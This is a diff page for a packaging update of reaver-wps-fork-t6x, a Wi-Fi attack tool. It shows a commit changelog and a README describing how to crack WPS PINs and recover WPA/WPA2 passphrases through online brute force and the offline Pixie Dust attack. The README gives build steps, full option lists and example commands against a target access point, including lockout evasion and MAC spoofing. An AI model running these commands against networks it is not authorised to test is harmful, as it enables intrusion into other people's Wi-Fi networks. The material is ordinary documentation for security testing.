New upstream version 1.5.3+git20170413
Sophie Brun
7 years ago
0 | ## Change Log | |
1 | ||
2 | ## (04/06/2015) | |
3 | - [89288d9](https://github.com/t6x/reaver-wps-fork-t6x/commit/89288d983b9057b3124718d4edd4983a7114d333) Added -H PixieHash logging option in reaver (@d8tahead) | |
4 | - [ea796ee](https://github.com/t6x/reaver-wps-fork-t6x/commit/ea796ee05b0ac712477d8adc6e79c347c2a57635) Reaver pixie data in new verbose mode (-vvv) (@t6x) | |
5 | - [f26803e](https://github.com/t6x/reaver-wps-fork-t6x/commit/f26803e9fc9f656d7d26d822fb6d6de830dcd8ad) Zyxel default pin generator (@kib0rg) | |
6 | - [845501b](https://github.com/t6x/reaver-wps-fork-t6x/commit/845501b351fca4c16b7a460b857c28b73302ee10) Makefile Cflag, parallel fix (@t6x) | |
7 | - [845501b](https://github.com/t6x/reaver-wps-fork-t6x/commit/845501b351fca4c16b7a460b857c28b73302ee10) Fix some compiler warnings (@t6x) | |
8 | - [845501b](https://github.com/t6x/reaver-wps-fork-t6x/commit/845501b351fca4c16b7a460b857c28b73302ee10) Fix drop faulty (@t6x) | |
9 | - [845501b](https://github.com/t6x/reaver-wps-fork-t6x/commit/845501b351fca4c16b7a460b857c28b73302ee10) Wpsmon use less space in output (@t6x) | |
10 | - [845501b](https://github.com/t6x/reaver-wps-fork-t6x/commit/845501b351fca4c16b7a460b857c28b73302ee10) Fix wash probe request (@t6x) | |
11 | ||
12 | ## (31/05/2015) | |
13 | - [a41ae4f](https://github.com/t6x/reaver-wps-fork-t6x/commit/a41ae4fd3ee4f9091d74a2ea8f2a9f4227b66c9c) Bug Fix, Pixewps mutual exclusivity with -r and -S options (@ldm314) | |
14 | ||
15 | ## (15/05/2015) | |
16 | - [63c5c02](https://github.com/t6x/reaver-wps-fork-t6x/commit/63c5c02bfc44e732399118d844906b0708e8e28c) Bug Fix, reaver -g option (@t6x) | |
17 | - [63c5c02](https://github.com/t6x/reaver-wps-fork-t6x/commit/63c5c02bfc44e732399118d844906b0708e8e28c) Bug Fix, reaver -p option (@t6x) | |
18 | - [63c5c02](https://github.com/t6x/reaver-wps-fork-t6x/commit/63c5c02bfc44e732399118d844906b0708e8e28c) Bug Fix, fix M7 Message (@t6x) | |
19 | - [63c5c02](https://github.com/t6x/reaver-wps-fork-t6x/commit/63c5c02bfc44e732399118d844906b0708e8e28c) Bug Fix, fix time out in M3 or M5 message (@t6x) | |
20 | - [63c5c02](https://github.com/t6x/reaver-wps-fork-t6x/commit/63c5c02bfc44e732399118d844906b0708e8e28c) Wash Ignore FCS by default (-C option)(@t6x) | |
21 | - [63c5c02](https://github.com/t6x/reaver-wps-fork-t6x/commit/63c5c02bfc44e732399118d844906b0708e8e28c) Credits (@t6x) | |
22 | - [63c5c02](https://github.com/t6x/reaver-wps-fork-t6x/commit/63c5c02bfc44e732399118d844906b0708e8e28c) Change Log (@t6x) | |
23 | ||
24 | ## (11/05/2015) | |
25 | - [ead842c](https://github.com/t6x/reaver-wps-fork-t6x/commit/ead842cf17a160e6fcc0f396066c4da758912593) Bug Fix (@t6x) | |
26 | ||
27 | ## (04/05/2015) | |
28 | - [68515bd](https://github.com/t6x/reaver-wps-fork-t6x/commit/68515bd90d9c952992bfe0d152c069a8e25521bf) Improved code (@t6x) | |
29 | - [a28b0af](https://github.com/t6x/reaver-wps-fork-t6x/commit/a28b0af2a909394156fa699a1fa3750d10ff0613) Improved code, updating to use -f option of pixiewps (@t6x) | |
30 | - [714fdcf](https://github.com/t6x/reaver-wps-fork-t6x/commit/714fdcf005be92dc58db31ca1a51f5c27ea19d4f) Updated build reaver instructions (@soxrok2212) | |
31 | - [c69503a](https://github.com/t6x/reaver-wps-fork-t6x/commit/c69503a4d485b06ca601329332cde67c64a8aa55) Update wpsmon.c (@t6x) | |
32 | - [ab303ae](https://github.com/t6x/reaver-wps-fork-t6x/commit/ab303aeb4aaef04709c741e880525c635b7dc8ce) Update wpscrack.c (@t6x) | |
33 | - [679bf56](https://github.com/t6x/reaver-wps-fork-t6x/commit/679bf56e1d6a3436adf15a78f3dbff8c032ee62b) Update README.md (@t6x) | |
34 | ||
35 | ## (02/05/2015) | |
36 | - [a29e53f](https://github.com/t6x/reaver-wps-fork-t6x/commit/a29e53fdc3f7520aa7228ad3438d5054676af55d) Fixed bad pin parsing (@wiire) | |
37 | ||
38 | ## (28/04/2015) | |
39 | - [88b0a90](https://github.com/t6x/reaver-wps-fork-t6x/commit/88b0a90d0f871be118ac8f96fa676b5be7c56ea3) Update wps_registrar.c (@d8tahead) | |
40 | - [61a96dc](https://github.com/t6x/reaver-wps-fork-t6x/commit/61a96dc8b5b41e386591e36a758f6b9711218557) Add R-Nonce and Model Name output (@t6x) | |
41 | - [485a6b8](https://github.com/t6x/reaver-wps-fork-t6x/commit/485a6b8b7bbac8433ddf4b04f1cd1a885e3d6261) Add Model Name in output (@t6x) | |
42 | ||
43 | ## (27/04/2015) | |
44 | - [cccae8d](https://github.com/t6x/reaver-wps-fork-t6x/commit/cccae8d0a0b0f980c29861bec02152ac07d505e5) Update wps_registrar.c (@d8tahead) | |
45 | - [34583f6](https://github.com/t6x/reaver-wps-fork-t6x/commit/34583f62416e29f4226c2769e524607feb5f6b86) Update wps_registrar.c (@d8tahead) | |
46 | ||
47 | ## (26/04/2015) | |
48 | - [086e4d9](https://github.com/t6x/reaver-wps-fork-t6x/commit/086e4d9d5aaa166940c9e507edaf4e359a2ed59a) Added [P] R-Nonce for future pixiewps use :) (@d8tahead) | |
49 | ||
50 | ## (21/04/2015) | |
51 | - [94cd799](https://github.com/t6x/reaver-wps-fork-t6x/commit/94cd79967d09eedd43f151b3992e335ecff7479d) Update globule.c (@d8tahead) | |
52 | - [2166159](https://github.com/t6x/reaver-wps-fork-t6x/commit/2166159f8534c46d8d9250558fb9bd36c0aa9aae) Update globule.h (@d8tahead) | |
53 | - [866919b](https://github.com/t6x/reaver-wps-fork-t6x/commit/866919b9cf08e19e08152b422ddd0a5d4b42f494) Update exchange.c (@d8tahead) | |
54 | - [f767655](https://github.com/t6x/reaver-wps-fork-t6x/commit/f767655b0254758048aed44bfb77981d66028a20) Serial number printf fix (@soxrok2212) | |
55 | ||
56 | ## (20/04/2015) | |
57 | - [ae579a1](https://github.com/t6x/reaver-wps-fork-t6x/commit/ae579a1eef4f5e00958c44ae9bc1d1af6e0ab1f1) Update README.md (@d8tahead) | |
58 | ||
59 | ## (19/04/2015) | |
60 | - [2e41e9f](https://github.com/t6x/reaver-wps-fork-t6x/commit/2e41e9fc1fc48b2beab1a2c99a56b705712d7a7d) Special realtek note (@soxrok2212) | |
61 | - [2e9c7af](https://github.com/t6x/reaver-wps-fork-t6x/commit/2e9c7af5b5c100b6dedec8651afa867cbe1541b2) Update README.md (@soxrok2212) | |
62 | - [9310bab](https://github.com/t6x/reaver-wps-fork-t6x/commit/9310babf80988d9a955ca55aae7072fdb1fea39f) Small fix (@soxrok2212) | |
63 | - [9358bf3](https://github.com/t6x/reaver-wps-fork-t6x/commit/9358bf38af5f0c254261745f05583c7242e5e0a7) A few more small fixes (@soxrok2212) | |
64 | - [a2bdeda](https://github.com/t6x/reaver-wps-fork-t6x/commit/a2bdeda3987e0328c1782117a7eb7ec79b033ccf) Grammer and Craig Heffner credit (@soxrok2212) | |
65 | - [b3be5fb](https://github.com/t6x/reaver-wps-fork-t6x/commit/b3be5fb95c86e577ac26bf06cb46f28a2d2052e3) Update wpsmon.c (@d8tahead) | |
66 | ||
67 | ## (18/04/2015) | |
68 | - [e20ba7d](https://github.com/t6x/reaver-wps-fork-t6x/commit/e20ba7d7920b21e9dfb0d4f7a1ef564d86037087) Changes in pixiewps use, idea soxrok2212 (@t6x) | |
69 | - [c6d2474](https://github.com/t6x/reaver-wps-fork-t6x/commit/c6d2474378d19c88cd1470e753a2c71aeeed58fc) Ideia by Soxrok2212, serial print in wash with option -g (@t6x) | |
70 | ||
71 | ## (17/04/2015) | |
72 | - [7298416](https://github.com/t6x/reaver-wps-fork-t6x/commit/7298416d1102a2d546eee0fa72a6445b565a59de) Merge with DataHead branch (@t6x) | |
73 | ||
74 | ## (16/04/2015) | |
75 | - [1a0994b](https://github.com/t6x/reaver-wps-fork-t6x/commit/1a0994b6b3b4b8424d8f31e8653ce010bf0d14e7) Credits devttys0 (@t6x) | |
76 | - [37032a5](https://github.com/t6x/reaver-wps-fork-t6x/commit/37032a5b2d351b80ad472df5947987f156d1b7fd) Default pin generator by devttys0 (@t6x) | |
77 | ||
78 | ## (15/04/2015) | |
79 | - [8d0ef55](https://github.com/t6x/reaver-wps-fork-t6x/commit/8d0ef55d244fb75138cce6e94921cf230f110b9b) Credits (@t6x) | |
80 | - [d65da86](https://github.com/t6x/reaver-wps-fork-t6x/commit/d65da863530822d83627457a44a9e94ba1617ab6) Reaver serial number output verbose (@t6x) | |
81 | - [433636e](https://github.com/t6x/reaver-wps-fork-t6x/commit/433636ef5e87a69d84531c15d312beeade597863) Update README.md (@t6x) | |
82 | - [1da780f](https://github.com/t6x/reaver-wps-fork-t6x/commit/1da780f3e6d460814561de888457133198cd1597) Suggestion made by kcdtv, -g option in wash (@t6x) | |
83 | - [a5887a3](https://github.com/t6x/reaver-wps-fork-t6x/commit/a5887a344485d0ebea119fc4ffb62aa23e2fd494) Update argsparser.c | |
84 | ||
85 | ## (14/04/2015) | |
86 | - [49da190](https://github.com/t6x/reaver-wps-fork-t6x/commit/49da190b74de4dac061932a153519e0f0b470812) DataHead Mod (@t6x) | |
87 | - [4b8e614](https://github.com/t6x/reaver-wps-fork-t6x/commit/4b8e6148842a552e9d3cb63b23e24a39dfff9f38) Wash output piped option (@t6x) | |
88 | ||
89 | ## (13/04/2015) | |
90 | - [ab614cc](https://github.com/t6x/reaver-wps-fork-t6x/commit/ab614cce81cb1625b14e4702dfbe548fea4174d4) Update README.md (@t6x) | |
91 | - [4cbab1c](https://github.com/t6x/reaver-wps-fork-t6x/commit/4cbab1c8e45118dc8fcb4b00499e4fe08feebf7f) Bug Fixes (@t6x) | |
92 | ||
93 | ## (12/04/2015) | |
94 | - [9756028](https://github.com/t6x/reaver-wps-fork-t6x/commit/9756028c2ea1c658a7ecab0e9cddd9b9a2c4b607) Update README.md (@t6x) | |
95 | - [dc9e2b0](https://github.com/t6x/reaver-wps-fork-t6x/commit/dc9e2b0d678ef313827c3cafcef916678d1d116c) Create README.md (@t6x) | |
96 | - [68b3897](https://github.com/t6x/reaver-wps-fork-t6x/commit/68b38976e51a07cf4ca7c282a7a5582ba4b019a7) Automatic get pass (idea made by nooro) (@t6x) | |
97 | ||
98 | ## (11/04/2015) | |
99 | - [f52c553](https://github.com/t6x/reaver-wps-fork-t6x/commit/f52c553bbff05e8fa03d64732d772f04e099c90c) First commit (@t6x) |
0 | # Overview | |
0 | 1 | |
1 | #Overview | |
2 | reaver-wps-fork-t6x is a modification done from a fork of reaver (https://code.google.com/p/reaver-wps-fork/) | |
3 | This modified version uses the Pixie Dust Attack to find the correct WPS PIN. | |
4 | This attack works against many Ralink, Broadcom, and Realtek APs | |
5 | The attack used in this version was developed by Wiire (https://github.com/wiire/pixiewps) | |
2 | **Reaver** has been designed to be a robust and practical attack against **Wi-Fi Protected Setup (WPS)** registrar PINs in order to **recover WPA/WPA2 passphrases**. It has been tested against a wide variety of access points and WPS implementations. | |
6 | 3 | |
7 | #Install Required Libraries and Tools | |
4 | The **original** Reaver implements a **online brute force attack** against, as described in [http://sviehb.files.wordpress.com/2011/12/viehboeck_wps.pdf](http://sviehb.files.wordpress.com/2011/12/viehboeck_wps.pdf). | |
5 | **reaver-wps-fork-t6x** is a **community forked version**, which has included **various bug fixes** and additional attack method (the **offline Pixie Dust** attack). | |
8 | 6 | |
9 | Libraries for reaver | |
10 | sudo apt-get install libpcap-dev aircrack-ng sqlite3 libsqlite3-dev | |
11 | ||
12 | Tools | |
13 | You must install Pixiewps by Wiire (https://github.com/wiire/pixiewps) | |
7 | **Depending on the target's Access Point (AP)**, to recover the plain text WPA/WPA2 passphrase the **average** amount of time for the transitional **online brute force** method is **between 4-10 hours**. In practice, it will generally take half this time to guess the correct WPS pin and recover the passphrase. | |
8 | When using the **offline attack**, **if** the AP is vulnerable, it may take only a matter of **seconds to minutes**. | |
14 | 9 | |
10 | * The original Reaver (v1.4) can be found here: [https://code.google.com/p/reaver-wps/](https://code.google.com/p/reaver-wps/). | |
11 | * The discontinued community edition of Reaver (v1.5) that was used as the starting point: [https://code.google.com/p/reaver-wps-fork/](https://code.google.com/p/reaver-wps-fork/). | |
12 | * reaver-wps-fork-t6x community edition of Reaver (which includes the Pixie Dust attack): [https://github.com/t6x/reaver-wps-fork-t6x](https://github.com/t6x/reaver-wps-fork-t6x). | |
13 | * For more information about the Pixie Dust attack (including **which APs are vulnerable**) can be found here: [https://github.com/wiire/pixiewps](https://github.com/wiire/pixiewps), | |
14 | [https://forums.kali.org/showthread.php?24286-WPS-Pixie-Dust-Attack-(Offline-WPS-Attack)](https://forums.kali.org/showthread.php?24286-WPS-Pixie-Dust-Attack-(Offline-WPS-Attack)) & [https://docs.google.com/spreadsheets/d/1tSlbqVQ59kGn8hgmwcPTHUECQ3o9YhXR91A_p7Nnj5Y/edit?usp=sharing](https://docs.google.com/spreadsheets/d/1tSlbqVQ59kGn8hgmwcPTHUECQ3o9YhXR91A_p7Nnj5Y/edit?usp=sharing) | |
15 | 15 | |
16 | #Compile and Install | |
16 | - - - | |
17 | 17 | |
18 | Build Reaver | |
19 | ||
20 | cd reaver-wps-fork-t6x-master | |
21 | cd src | |
22 | ./configure | |
23 | make | |
18 | # Requirements | |
24 | 19 | |
25 | Install Reaver | |
26 | ||
27 | sudo make install | |
28 | ||
29 | #Reaver Usage | |
20 | ``` | |
21 | apt-get -y install build-essential libpcap-dev aircrack-ng pixiewps | |
22 | ``` | |
23 | _The example uses [Kali Linux](https://www.kali.org/) as the Operating System (OS) as `pixiewps` is included._ | |
30 | 24 | |
31 | Reaver v1.5.2 WiFi Protected Setup Attack Tool | |
32 | Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]> | |
33 | mod by t6_x <[email protected]> & DataHead & Soxrok2212 | |
25 | You **must** already have Wiire's Pixiewps installed. | |
26 | The latest version can be found here: [https://github.com/wiire/pixiewps](https://github.com/wiire/pixiewps). | |
34 | 27 | |
35 | Required Arguments: | |
36 | -i, --interface=<wlan> Name of the monitor-mode interface to use | |
37 | -b, --bssid=<mac> BSSID of the target AP | |
28 | - - - | |
38 | 29 | |
39 | Optional Arguments: | |
40 | -m, --mac=<mac> MAC of the host system | |
41 | -e, --essid=<ssid> ESSID of the target AP | |
42 | -c, --channel=<channel> Set the 802.11 channel for the interface (implies -f) | |
43 | -o, --out-file=<file> Send output to a log file [stdout] | |
44 | -s, --session=<file> Restore a previous session file | |
45 | -C, --exec=<command> Execute the supplied command upon successful pin recovery | |
46 | -D, --daemonize Daemonize reaver | |
47 | -a, --auto Auto detect the best advanced options for the target AP | |
48 | -f, --fixed Disable channel hopping | |
49 | -5, --5ghz Use 5GHz 802.11 channels | |
50 | -v, --verbose Display non-critical warnings (-vv for more) | |
51 | -q, --quiet Only display critical messages | |
52 | -K --pixie-dust=<number> [1] Run pixiewps with PKE, PKR, E-Hash1, E-Hash2, E-Nonce and Authkey (Ralink, Broadcom, Realtek) | |
53 | -Z, --no-auto-pass Do NOT run reaver to auto retrieve WPA password if pixiewps attack is successful | |
54 | -h, --help Show help | |
30 | # Setup | |
55 | 31 | |
56 | Advanced Options: | |
57 | -p, --pin=<wps pin> Use the specified 4 or 8 digit WPS pin | |
58 | -d, --delay=<seconds> Set the delay between pin attempts [1] | |
59 | -l, --lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60] | |
60 | -g, --max-attempts=<num> Quit after num pin attempts | |
61 | -x, --fail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0] | |
62 | -r, --recurring-delay=<x:y> Sleep for y seconds every x pin attempts | |
63 | -t, --timeout=<seconds> Set the receive timeout period [5] | |
64 | -T, --m57-timeout=<seconds> Set the M5/M7 timeout period [0.20] | |
65 | -A, --no-associate Do not associate with the AP (association must be done by another application) | |
66 | -N, --no-nacks Do not send NACK messages when out of order packets are received | |
67 | -S, --dh-small Use small DH keys to improve crack speed | |
68 | -L, --ignore-locks Ignore locked state reported by the target AP | |
69 | -E, --eap-terminate Terminate each WPS session with an EAP FAIL packet | |
70 | -n, --nack Target AP always sends a NACK [Auto] | |
71 | -w, --win7 Mimic a Windows 7 registrar [False] | |
72 | -X, --exhaustive Set exhaustive mode from the beginning of the session [False] | |
73 | -1, --p1-index Set initial array index for the first half of the pin [False] | |
74 | -2, --p2-index Set initial array index for the second half of the pin [False] | |
75 | -P, --pixiedust-loop Set into PixieLoop mode (doesn't send M4, and loops through to M3) [False] | |
76 | -W, --generate-pin Default Pin Generator by devttys0 team [1] Belkin [2] D-Link | |
32 | **Download** | |
77 | 33 | |
78 | Example: | |
79 | reaver -i mon0 -b 00:AA:BB:11:22:33 -vv -K 1 | |
80 | ||
81 | #Option (K) | |
34 | `git clone https://github.com/t6x/reaver-wps-fork-t6x` | |
82 | 35 | |
83 | The -K option 1 runs pixiewps with PKE, PKR, E-Hash1, E-Hash2, E-Nonce and the Authkey. pixiewps will try to attack Ralink, Broadcom and Realtek | |
84 | *Special note: if you are attacking a Realtek AP, do NOT use small DH Keys (-S) | |
36 | or | |
85 | 37 | |
86 | #Option (P) in reaver | |
87 | Option (-P) in reaver puts reaver into a loop mode that does not do the WPS protocol to or past the M4 message to hopefully avoid lockouts. This is to ONLY be used for PixieHash collecting to use with pixiewps, NOT to 'online' bruteforce pins. | |
38 | `wget https://github.com/t6x/reaver-wps-fork-t6x/archive/master.zip && unzip master.zip` | |
88 | 39 | |
89 | This option was made with intent of: | |
40 | **Build** | |
90 | 41 | |
91 | ----Collecting repetitive hashes for further comparison and or analysis / discovery of new vulnerable chipsets , routers etc.. | |
42 | ```bash | |
43 | cd reaver-wps-fork-t6x*/ | |
44 | cd src/ | |
45 | ./configure | |
46 | make | |
47 | ``` | |
92 | 48 | |
93 | ----Time sensistive attacks where the hash collecting continues repetitively until your time frame is met. | |
49 | **Install** | |
94 | 50 | |
95 | ----For scripting purposes of whom want to use a possible lockout preventable way of PixieHash gathering for your Use case. | |
51 | `sudo make install` | |
96 | 52 | |
97 | #Wash Usage | |
53 | - - - | |
98 | 54 | |
99 | Wash v1.5.2 WiFi Protected Setup Scan Tool | |
100 | Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]> | |
101 | mod by t6_x <[email protected]> & DataHead & Soxrok2212 | |
55 | # Reaver Usage | |
102 | 56 | |
103 | Required Arguments: | |
104 | -i, --interface=<iface> Interface to capture packets on | |
105 | -f, --file [FILE1 FILE2 FILE3 ...] Read packets from capture files | |
57 | ``` | |
58 | Reaver v1.5.3 WiFi Protected Setup Attack Tool | |
59 | Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]> | |
60 | mod by t6_x <[email protected]> & DataHead & Soxrok2212 & Wiire & AAnarchYY & KokoSoft | |
106 | 61 | |
107 | Optional Arguments: | |
108 | -c, --channel=<num> Channel to listen on [auto] | |
109 | -o, --out-file=<file> Write data to file | |
110 | -n, --probes=<num> Maximum number of probes to send to each AP in scan mode [15] | |
111 | -D, --daemonize Daemonize wash | |
112 | -C, --ignore-fcs Ignore frame checksum errors | |
113 | -5, --5ghz Use 5GHz 802.11 channels | |
114 | -s, --scan Use scan mode | |
115 | -u, --survey Use survey mode [default] | |
116 | -P, --file-output-piped Allows Wash output to be piped. Example. wash x|y|z... | |
117 | -g, --get-chipset Pipes output and runs reaver alongside to get chipset | |
118 | -h, --help Show help | |
62 | Required Arguments: | |
63 | -i, --interface=<wlan> Name of the monitor-mode interface to use | |
64 | -b, --bssid=<mac> BSSID of the target AP | |
119 | 65 | |
120 | Example: | |
121 | wash -i mon0 | |
122 | ||
123 | ||
124 | #Option (g) | |
125 | The option -g of wash, automatically runs the reaver to receive the chipset data. | |
126 | If the AP does not respond to them quickly, this option will be slow to display the data, | |
127 | because the reaver will stay running until getting the data or until you reach your timeout limit (30 secs) | |
128 | ||
66 | Optional Arguments: | |
67 | -m, --mac=<mac> MAC of the host system | |
68 | -e, --essid=<ssid> ESSID of the target AP | |
69 | -c, --channel=<channel> Set the 802.11 channel for the interface (implies -f) | |
70 | -o, --out-file=<file> Send output to a log file [stdout] | |
71 | -s, --session=<file> Restore a previous session file | |
72 | -C, --exec=<command> Execute the supplied command upon successful pin recovery | |
73 | -D, --daemonize Daemonize reaver | |
74 | -a, --auto Auto detect the best advanced options for the target AP | |
75 | -f, --fixed Disable channel hopping | |
76 | -5, --5ghz Use 5GHz 802.11 channels | |
77 | -v, --verbose Display non-critical warnings (-vv for more) | |
78 | -q, --quiet Only display critical messages | |
79 | -K --pixie-dust=<number> [1] Run pixiewps with PKE, PKR, E-Hash1, E-Hash2 and E-Nonce (Ralink, Broadcom & Realtek) | |
80 | -Z, --no-auto-pass Do NOT run reaver to auto retrieve WPA password if Pixiewps attack is successful | |
81 | -h, --help Show help | |
129 | 82 | |
130 | #Contribution | |
131 | Modifications made by t6_x, DataHead, Soxrok2212 | |
83 | Advanced Options: | |
84 | -p, --pin=<wps pin> Use the specified 4 or 8 digit WPS pin | |
85 | -d, --delay=<seconds> Set the delay between pin attempts [1] | |
86 | -l, --lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60] | |
87 | -F, --fake-delay=<seconds> Set the time to sleep after received fake NACK [0] | |
88 | -R, --fake-reason=<nack reason> Specifies the reason code for NACK used in the FAKE NACK | |
89 | -I, --ignore-reason Ignore change of reason code for NACK | |
90 | -g, --max-attempts=<num> Quit after num pin attempts | |
91 | -x, --fail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0] | |
92 | -r, --recurring-delay=<x:y> Sleep for y seconds every x pin attempts | |
93 | -t, --timeout=<seconds> Set the receive timeout period [5] | |
94 | -T, --m57-timeout=<seconds> Set the M5/M7 timeout period [0.20] | |
95 | -A, --no-associate Do not associate with the AP (association must be done by another application) | |
96 | -N, --no-nacks Do not send NACK messages when out of order packets are received | |
97 | -S, --dh-small Use small DH keys to improve crack speed | |
98 | -L, --ignore-locks Ignore locked state reported by the target AP | |
99 | -E, --eap-terminate Terminate each WPS session with an EAP FAIL packet | |
100 | -n, --nack Target AP always sends a NACK [Auto] | |
101 | -w, --win7 Mimic a Windows 7 registrar [False] | |
102 | -X, --exhaustive Set exhaustive mode from the beginning of the session [False] | |
103 | -1, --p1-index Set initial array index for the first half of the pin [False] | |
104 | -2, --p2-index Set initial array index for the second half of the pin [False] | |
105 | -P, --pixiedust-loop Set into PixieLoop mode (doesn't send M4, and loops through to M3) [False] | |
106 | -W, --generate-pin Default Pin Generator [1] Belkin [2] D-Link [3] Zyxel | |
107 | -H, --pixiedust-log Enables logging of sequence completed PixieHashes | |
132 | 108 | |
133 | Some ideas made by nuroo, kcdtv | |
109 | Example: | |
110 | reaver -i wlan0mon -b 00:90:4C:C1:AC:21 -vvv -K 1 | |
111 | ``` | |
134 | 112 | |
135 | #Special Thanks | |
136 | Soxrok2212 for all work done to help in the development of tools | |
137 | Wiire for developing Pixiewps | |
138 | Craig Heffner for creating Reaver and for the creation of default pin generators (D-Link, Belkin) | |
139 | (http://www.devttys0.com/) | |
113 | ## -K // --pixie-dust | |
114 | ||
115 | The `-K 1` option performs the offline attack, Pixie Dust _(`pixiewps`)_, by automatically passing the **PKE**, **PKR**, **E-Hash1**, **E-Hash2**, **E-Nonce** and **Authkey** variables. `pixiewps` will then try to attack **Ralink**, **Broadcom** and **Realtek** detected chipset. | |
116 | **Special note**: If you are attacking a **Realtek AP**, **do NOT** use small DH Keys (`-S`) option. | |
117 | ||
118 | ## -H // --pixiedust-log | |
119 | ||
120 | The `-H` option is a switch to enable logging of PixieHashes, **saved hashes** will be saved in the **executing directory**. | |
121 | This option requires you to have at the least `-vvv` switch on and will work with `-K 1` & `-P` appropriately. | |
122 | ||
123 | The files saved are named after the bssid (MAC) of the target, and with an extention of `.pixie`. | |
124 | On the inside of these saved logs, you will find all the required **PixieDust hashes**, along with a **quick copy & paste ready full command** to use it on `pixiewps`. You also have the option to execute it. Just pop in the file into your favorite shell, and execute it _(`chmod +x <filename>` may be required)_. | |
125 | ||
126 | ## -P // --pixiedust-loop | |
127 | ||
128 | When using the `-P` option, Reaver goes into a loop mode that breaks the WPS protocol by not using M4 message to **hopefully avoid lockouts**. | |
129 | This is to **ONLY** be used for PixieHash collecting to use with `pixiewps`, **NOT** to brute force 'online' pins. | |
130 | ||
131 | This option was made with intent of: | |
132 | ||
133 | * Collecting repetitive hashes for further comparison and or analysis / **discovery of new vulnerable chipsets**, routers etc.. | |
134 | * **Time sensitive attacks** where the hash collecting continues repetitively until your time frame is met. | |
135 | * For **scripting purposes** of whom want to use a possible lockout preventable way of PixieHash gathering for your use case. | |
136 | ||
137 | - - - | |
138 | ||
139 | # Wash Usage | |
140 | ||
141 | ``` | |
142 | Wash v1.5.3 WiFi Protected Setup Scan Tool | |
143 | Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]> | |
144 | mod by t6_x<[email protected]>, DataHead, Soxrok2212, Wiire, AAnarchYY & rofl0r | |
145 | ||
146 | Required Arguments: | |
147 | -i, --interface=<iface> Interface to capture packets on | |
148 | -f, --file [FILE1 FILE2 FILE3 ...] Read packets from capture files | |
149 | ||
150 | Optional Arguments: | |
151 | -c, --channel=<num> Channel to listen on [auto] | |
152 | -o, --out-file=<file> Write data to file | |
153 | -n, --probes=<num> Maximum number of probes to send to each AP in scan mode [15] | |
154 | -D, --daemonize Daemonize wash | |
155 | -5, --5ghz Use 5GHz 802.11 channels | |
156 | -s, --scan Use scan mode | |
157 | -u, --survey Use survey mode [default] | |
158 | -P, --output-piped Allows Wash output to be piped. Example. wash x|y|z... | |
159 | -g, --get-chipset Pipes output and runs reaver alongside to get chipset | |
160 | -a, --all Show all APs, even those without WPS | |
161 | -h, --help Show help | |
162 | ||
163 | Example: | |
164 | wash -i wlan0mon | |
165 | ``` | |
166 | ||
167 | ## -g // --get-chipset | |
168 | ||
169 | The option `-g` of Wash automatically runs Reaver to receive the chipset data. | |
170 | **If** the AP does not respond to them quickly, this option will be **slow to display the data**, because Reaver will stay running until it receives the data or until you reach your timeout limit (30 seconds). | |
171 | ||
172 | ## -a // --all | |
173 | ||
174 | The option `-a` of Wash will list all access points, including those without WPS enabled. | |
175 | - - - | |
176 | ||
177 | # Acknowledgements | |
178 | ||
179 | ## Contribution | |
180 | ||
181 | Modifications made by: | |
182 | `t6_x`, `DataHead`, `Soxrok2212`, `Wiire`, `AAnarchYY`, `kib0rg`, `KokoSoft`, `rofl0r`, `horrorho` | |
183 | ||
184 | Some ideas made by: | |
185 | `nuroo`, `kcdtv` | |
186 | ||
187 | Bug fixes made by: | |
188 | `alxchk`, `USUARIONUEVO`, `ldm314`, `vk496`, `falsovsky`, `rofl0r`, `xhebox` | |
189 | ||
190 | ## Special Thanks | |
191 | ||
192 | * `Soxrok2212` for all work done to help in the development of tools | |
193 | * `Wiire` for developing Pixiewps | |
194 | * `Craig Heffner` for creating Reaver and for the creation of default pin generators (D-Link, Belkin) - http://www.devttys0.com/ |
1 | 1 | |
2 | 2 | Usually, the only required arguments to Reaver are the interface name and the BSSID of the target AP: |
3 | 3 | |
4 | # reaver -i mon0 -b 00:01:02:03:04:05 | |
4 | # reaver -i wlan0mon -b 00:01:02:03:04:05 | |
5 | 5 | |
6 | 6 | It is suggested that you run Reaver in verbose mode in order to get more detailed information about |
7 | 7 | the attack as it progresses: |
8 | 8 | |
9 | # reaver -i mon0 -b 00:01:02:03:04:05 -vv | |
9 | # reaver -i wlan0mon -b 00:01:02:03:04:05 -vv | |
10 | 10 | |
11 | 11 | The channel and SSID (provided that the SSID is not cloaked) of the target AP will be automatically |
12 | 12 | identified by Reaver, unless explicitly specified on the command line: |
13 | 13 | |
14 | # reaver -i mon0 -b 00:01:02:03:04:05 -c 11 -e linksys | |
14 | # reaver -i wlan0mon -b 00:01:02:03:04:05 -c 11 -e linksys | |
15 | 15 | |
16 | 16 | Since version 1.3, Reaver implements the small DH key optimization as suggested by Stefan which can |
17 | 17 | speed up the attack speed: |
18 | 18 | |
19 | # reaver -i mon0 -b 00:01:02:03:04:05 --dh-small | |
19 | # reaver -i wlan0mon -b 00:01:02:03:04:05 --dh-small | |
20 | 20 | |
21 | 21 | By default, if the AP switches channels, Reaver will also change its channel accordingly. However, |
22 | 22 | this feature may be disabled by fixing the interface's channel: |
23 | 23 | |
24 | # reaver -i mon0 -b 00:01:02:03:04:05 --fixed | |
24 | # reaver -i wlan0mon -b 00:01:02:03:04:05 --fixed | |
25 | 25 | |
26 | 26 | When spoofing your MAC address, you must set the desired address to spoof using the ifconfig utility, |
27 | 27 | and additionally tell Reaver what the spoofed address is: |
28 | 28 | |
29 | # reaver -i mon0 -b 00:01:02:03:04:05 --mac=AA:BB:CC:DD:EE:FF | |
29 | # reaver -i wlan0mon -b 00:01:02:03:04:05 --mac=AA:BB:CC:DD:EE:FF | |
30 | 30 | |
31 | 31 | The default receive timeout period is 5 seconds. This timeout period can be set manually if necessary |
32 | 32 | (minimum timeout period is 1 second): |
33 | 33 | |
34 | # reaver -i mon0 -b 00:01:02:03:04:05 -t 2 | |
34 | # reaver -i wlan0mon -b 00:01:02:03:04:05 -t 2 | |
35 | 35 | |
36 | 36 | The default delay period between pin attempts is 1 second. This value can be increased or decreased |
37 | 37 | to any non-negative integer value. A value of zero means no delay: |
38 | 38 | |
